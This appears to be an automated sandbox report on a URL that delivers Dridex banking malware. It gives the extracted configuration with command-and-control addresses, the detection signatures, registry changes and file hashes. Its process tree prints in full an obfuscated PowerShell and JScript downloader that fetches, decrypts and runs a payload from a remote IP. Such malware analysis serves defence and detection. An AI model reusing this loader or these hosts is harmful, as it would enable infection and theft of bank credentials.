http://zero.testtrack.xyz/

General
Target

http://zero.testtrack.xyz/

Filesize

N/A

Completed

08-02-2021 23:46

Score
10 /10
Malware Config

Extracted

Family dridex
Botnet 10111
C2

51.68.224.245:4646

188.165.17.91:8443

173.255.246.77:691

rc4.plain
rc4.plain
Signatures 16

Filter: none

Defense Evasion
Discovery
  • Dridex

    Description

    Dridex(known as Bugat/Cridex) is a form of malware that specializes in stealing bank credentials.

  • Suspicious use of NtCreateProcessExOtherParentProcess
    WerFault.exe

    Reported IOCs

    descriptionpidprocesstarget process
    PID 416 created 2492416WerFault.exeIEXPLORE.EXE
  • CryptOne packer

    Description

    Detects CryptOne packer defined in NCC blogpost.

    Reported IOCs

    resourceyara_rule
    behavioral1/files/0x0003000000019c0b-31.datcryptone
    behavioral1/files/0x0003000000019c0b-30.datcryptone
  • Dridex Loader

    Description

    Detects Dridex both x86 and x64 loader in memory.

    Reported IOCs

    resourceyara_rule
    behavioral1/memory/208-32-0x0000000000400000-0x000000000043D000-memory.dmpdridex_ldr
    behavioral1/memory/208-34-0x0000000000400000-0x000000000043D000-memory.dmpdridex_ldr
  • Blocklisted process makes network request
    wscript.exe

    Reported IOCs

    flowpidprocess
    221568wscript.exe
  • Executes dropped EXE
    pogps.exe

    Reported IOCs

    pidprocess
    208pogps.exe
  • Checks installed software on the system

    Description

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    Tags

    TTPs

    Query Registry
  • Checks whether UAC is enabled
    pogps.exe

    TTPs

    System Information Discovery

    Reported IOCs

    descriptioniocprocess
    Key value queried\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUApogps.exe
  • Program crash
    WerFault.exe

    Reported IOCs

    pidpid_targetprocesstarget process
    4162492WerFault.exeIEXPLORE.EXE
  • Enumerates physical storage devices

    Description

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

    Tags

    TTPs

    System Information Discovery
  • Modifies Internet Explorer settings
    iexplore.exeIEXPLORE.EXE

    TTPs

    Modify Registry

    Reported IOCs

    descriptioniocprocess
    Key created\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearchiexplore.exe
    Set value (int)\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"iexplore.exe
    Set value (int)\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3514538792"iexplore.exe
    Set value (int)\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"iexplore.exe
    Set value (int)\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{FCB1C28E-6A67-11EB-BEBD-5649AA4EDE66} = "0"iexplore.exe
    Set value (int)\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30867060"iexplore.exe
    Set value (str)\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"iexplore.exe
    Key created\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManageriexplore.exe
    Set value (data)\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000iexplore.exe
    Set value (int)\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"iexplore.exe
    Key created\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActiveiexplore.exe
    Set value (str)\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"iexplore.exe
    Key created\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecoveryiexplore.exe
    Key created\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\MainIEXPLORE.EXE
    Set value (int)\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"iexplore.exe
    Set value (int)\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3514538792"iexplore.exe
    Key created\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Mainiexplore.exe
    Set value (int)\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30867060"iexplore.exe
  • Suspicious behavior: EnumeratesProcesses
    WerFault.exePowerShell.exe

    Reported IOCs

    pidprocess
    416WerFault.exe
    416WerFault.exe
    416WerFault.exe
    416WerFault.exe
    416WerFault.exe
    416WerFault.exe
    416WerFault.exe
    416WerFault.exe
    416WerFault.exe
    416WerFault.exe
    416WerFault.exe
    416WerFault.exe
    416WerFault.exe
    416WerFault.exe
    416WerFault.exe
    416WerFault.exe
    416WerFault.exe
    648PowerShell.exe
    648PowerShell.exe
    648PowerShell.exe
  • Suspicious use of AdjustPrivilegeToken
    WerFault.exePowerShell.exe

    Reported IOCs

    descriptionpidprocess
    Token: SeRestorePrivilege416WerFault.exe
    Token: SeBackupPrivilege416WerFault.exe
    Token: SeDebugPrivilege416WerFault.exe
    Token: SeDebugPrivilege648PowerShell.exe
  • Suspicious use of FindShellTrayWindow
    iexplore.exe

    Reported IOCs

    pidprocess
    1028iexplore.exe
  • Suspicious use of SetWindowsHookEx
    iexplore.exeIEXPLORE.EXE

    Reported IOCs

    pidprocess
    1028iexplore.exe
    1028iexplore.exe
    2492IEXPLORE.EXE
    2492IEXPLORE.EXE
  • Suspicious use of WriteProcessMemory
    iexplore.exeIEXPLORE.EXEPowerShell.execmd.exewscript.execmd.exe

    Reported IOCs

    descriptionpidprocesstarget process
    PID 1028 wrote to memory of 24921028iexplore.exeIEXPLORE.EXE
    PID 1028 wrote to memory of 24921028iexplore.exeIEXPLORE.EXE
    PID 1028 wrote to memory of 24921028iexplore.exeIEXPLORE.EXE
    PID 2492 wrote to memory of 6482492IEXPLORE.EXEPowerShell.exe
    PID 2492 wrote to memory of 6482492IEXPLORE.EXEPowerShell.exe
    PID 2492 wrote to memory of 6482492IEXPLORE.EXEPowerShell.exe
    PID 648 wrote to memory of 904648PowerShell.execmd.exe
    PID 648 wrote to memory of 904648PowerShell.execmd.exe
    PID 648 wrote to memory of 904648PowerShell.execmd.exe
    PID 904 wrote to memory of 1568904cmd.exewscript.exe
    PID 904 wrote to memory of 1568904cmd.exewscript.exe
    PID 904 wrote to memory of 1568904cmd.exewscript.exe
    PID 1568 wrote to memory of 6361568wscript.execmd.exe
    PID 1568 wrote to memory of 6361568wscript.execmd.exe
    PID 1568 wrote to memory of 6361568wscript.execmd.exe
    PID 636 wrote to memory of 208636cmd.exepogps.exe
    PID 636 wrote to memory of 208636cmd.exepogps.exe
    PID 636 wrote to memory of 208636cmd.exepogps.exe
Processes 8
  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" http://zero.testtrack.xyz/
    Modifies Internet Explorer settings
    Suspicious use of FindShellTrayWindow
    Suspicious use of SetWindowsHookEx
    Suspicious use of WriteProcessMemory
    PID:1028
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1028 CREDAT:82945 /prefetch:2
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:2492
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe
        ((((\..\PowerShell.exe -Command "<#AAAAAAAAAAAAAAAAAAAAAAAAA ((#>$a = ""Start-Process cmd.exe `"""cmd.exe /q /c cd /d "%tMp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y['set'+'Proxy'](n);y.open('GET',k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/['Wait'+'ForResponse']();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e['cha'+'rCodeAt'](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join('')};try{var u=WScript.Echo(),o='Object',A=Math,a=Function('b','return WScript.Create'+o+'(b)');P=(''+WScript).split(' ')[1],M='indexOf',q=a(P+'ing.FileSystem'+o),m=WScript.Arguments,e='WinHTTP',Z='cmd',Q=a('WinHttp.WinHttpRequest.5.1'),j=a('W'+P+'.Shell'),s=a('ADODB.Stream'),x=O(8)+'.',p='exe',n=0,K=WScript[P+'FullName'],E='.'+p;s.Type=2;s.Charset='iso-8859-1';s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]('PE\x00\x00'));s.WriteText(v);if(31^<d){var z=1;x+='dll'}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x='regsvr'+32+E+' /s '+x);j.run(Z+E+' /c '+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp cvbdfg http://188.227.57.214/?NTcyODI=^&XTBMeA^&oa1n4=xHrQMrXYbRvFFYbfLfjKRqFbNUv^&s2ht4=RGUWVxo2bk63PE5qpZDLGpbD1DBmgqVmAH16-t_d0erFOfQe5zUGwKQFlyYpUV15C8Kr7jkLQyhWfhpOD-xGFNAlEqpGcE7Vt31nwzrVFcMh0wRKFumIG_OkbUVkU4gkjwaqLFaL5^&vSerGMTI1Mg== "1"`"""""" ; Invoke-Command -ScriptBlock ([Scriptblock]::Create($a))"
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        PID:648
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" cmd.exe /q /c cd /d %tMp% && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y['set'+'Proxy'](n);y.open('GET',k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/['Wait'+'ForResponse']();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e['cha'+'rCodeAt'](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join('')};try{var u=WScript.Echo(),o='Object',A=Math,a=Function('b','return WScript.Create'+o+'(b)');P=(''+WScript).split(' ')[1],M='indexOf',q=a(P+'ing.FileSystem'+o),m=WScript.Arguments,e='WinHTTP',Z='cmd',Q=a('WinHttp.WinHttpRequest.5.1'),j=a('W'+P+'.Shell'),s=a('ADODB.Stream'),x=O(8)+'.',p='exe',n=0,K=WScript[P+'FullName'],E='.'+p;s.Type=2;s.Charset='iso-8859-1';s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]('PE\x00\x00'));s.WriteText(v);if(31^<d){var z=1;x+='dll'}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x='regsvr'+32+E+' /s '+x);j.run(Z+E+' /c '+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp cvbdfg http://188.227.57.214/?NTcyODI=^&XTBMeA^&oa1n4=xHrQMrXYbRvFFYbfLfjKRqFbNUv^&s2ht4=RGUWVxo2bk63PE5qpZDLGpbD1DBmgqVmAH16-t_d0erFOfQe5zUGwKQFlyYpUV15C8Kr7jkLQyhWfhpOD-xGFNAlEqpGcE7Vt31nwzrVFcMh0wRKFumIG_OkbUVkU4gkjwaqLFaL5^&vSerGMTI1Mg== 1
          Suspicious use of WriteProcessMemory
          PID:904
          • C:\Windows\SysWOW64\wscript.exe
            wsCripT //B //E:JScript 3.tMp cvbdfg http://188.227.57.214/?NTcyODI=&XTBMeA&oa1n4=xHrQMrXYbRvFFYbfLfjKRqFbNUv&s2ht4=RGUWVxo2bk63PE5qpZDLGpbD1DBmgqVmAH16-t_d0erFOfQe5zUGwKQFlyYpUV15C8Kr7jkLQyhWfhpOD-xGFNAlEqpGcE7Vt31nwzrVFcMh0wRKFumIG_OkbUVkU4gkjwaqLFaL5&vSerGMTI1Mg== 1
            Blocklisted process makes network request
            Suspicious use of WriteProcessMemory
            PID:1568
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c pogps.exe
              Suspicious use of WriteProcessMemory
              PID:636
              • C:\Users\Admin\AppData\Local\Temp\pogps.exe
                pogps.exe
                Executes dropped EXE
                Checks whether UAC is enabled
                PID:208
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 2492 -s 2424
        Suspicious use of NtCreateProcessExOtherParentProcess
        Program crash
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        PID:416
Network
MITRE ATT&CK Matrix
Collection
    Command and Control
      Credential Access
        Defense Evasion
        Execution
          Exfiltration
            Impact
              Initial Access
                Lateral Movement
                  Persistence
                    Privilege Escalation
                      Replay Monitor
                      00:00 00:00
                      Downloads
                      • C:\Users\Admin\AppData\Local\Temp\3.tMp

                        MD5

                        88acae3e364010e82fb022c29ab69c9d

                        SHA1

                        043f08caaf36d317c60977dd9bdaa2be62ed54a0

                        SHA256

                        f14c7ba0240be3456164dd63f53dd4bc7eb34bcdb1ac26e98a623edc0390b56b

                        SHA512

                        38283522ffc8d6026c6298b3405f4274c833f3bf36d96648c0030d3aacea1a61553cea20ec0307ab6711e77ca5aadb4a7db308ed942434d5c8cf0733a3a4b27c

                      • C:\Users\Admin\AppData\Local\Temp\pogps.exe

                        MD5

                        ef10edc180a8e7ccf3240bbb5a73d08b

                        SHA1

                        b5acf4ab8d560d36d96e91419ba79f1eff6089cc

                        SHA256

                        f2033c521ba361036d11483e0097233ec2571f4ba5d44c3e828b9b83d379cfb0

                        SHA512

                        33fcbeb19040d485fb95588d6e58a800771a9fc74b6e676cc4845c9cb9a633b69642caf2a2691a9f25b2d1596d4df23f90211645bfd50112bdf5369e575e6782

                      • C:\Users\Admin\AppData\Local\Temp\pogps.exe

                        MD5

                        ef10edc180a8e7ccf3240bbb5a73d08b

                        SHA1

                        b5acf4ab8d560d36d96e91419ba79f1eff6089cc

                        SHA256

                        f2033c521ba361036d11483e0097233ec2571f4ba5d44c3e828b9b83d379cfb0

                        SHA512

                        33fcbeb19040d485fb95588d6e58a800771a9fc74b6e676cc4845c9cb9a633b69642caf2a2691a9f25b2d1596d4df23f90211645bfd50112bdf5369e575e6782

                      • memory/208-34-0x0000000000400000-0x000000000043D000-memory.dmp

                      • memory/208-32-0x0000000000400000-0x000000000043D000-memory.dmp

                      • memory/208-33-0x0000000000670000-0x00000000006AC000-memory.dmp

                      • memory/208-29-0x0000000000000000-mapping.dmp

                      • memory/416-5-0x0000000004260000-0x0000000004261000-memory.dmp

                      • memory/416-4-0x0000000004260000-0x0000000004261000-memory.dmp

                      • memory/416-8-0x0000000004660000-0x0000000004661000-memory.dmp

                      • memory/636-28-0x0000000000000000-mapping.dmp

                      • memory/648-19-0x0000000007CB0000-0x0000000007CB1000-memory.dmp

                      • memory/648-15-0x00000000069B2000-0x00000000069B3000-memory.dmp

                      • memory/648-16-0x0000000007620000-0x0000000007621000-memory.dmp

                      • memory/648-17-0x0000000006DE0000-0x0000000006DE1000-memory.dmp

                      • memory/648-18-0x0000000007DA0000-0x0000000007DA1000-memory.dmp

                      • memory/648-14-0x00000000069B0000-0x00000000069B1000-memory.dmp

                      • memory/648-20-0x0000000008C50000-0x0000000008C51000-memory.dmp

                      • memory/648-21-0x0000000008950000-0x0000000008951000-memory.dmp

                      • memory/648-22-0x0000000008BB0000-0x0000000008BB1000-memory.dmp

                      • memory/648-23-0x00000000091F0000-0x00000000091F1000-memory.dmp

                      • memory/648-13-0x0000000006E50000-0x0000000006E51000-memory.dmp

                      • memory/648-12-0x0000000006F30000-0x0000000006F31000-memory.dmp

                      • memory/648-11-0x0000000006CB0000-0x0000000006CB1000-memory.dmp

                      • memory/648-27-0x00000000069B3000-0x00000000069B4000-memory.dmp

                      • memory/648-10-0x0000000006FF0000-0x0000000006FF1000-memory.dmp

                      • memory/648-9-0x0000000006970000-0x0000000006971000-memory.dmp

                      • memory/648-7-0x000000006EE50000-0x000000006F53E000-memory.dmp

                      • memory/648-3-0x0000000000000000-mapping.dmp

                      • memory/904-24-0x0000000000000000-mapping.dmp

                      • memory/1568-25-0x0000000000000000-mapping.dmp

                      • memory/2492-2-0x0000000000000000-mapping.dmp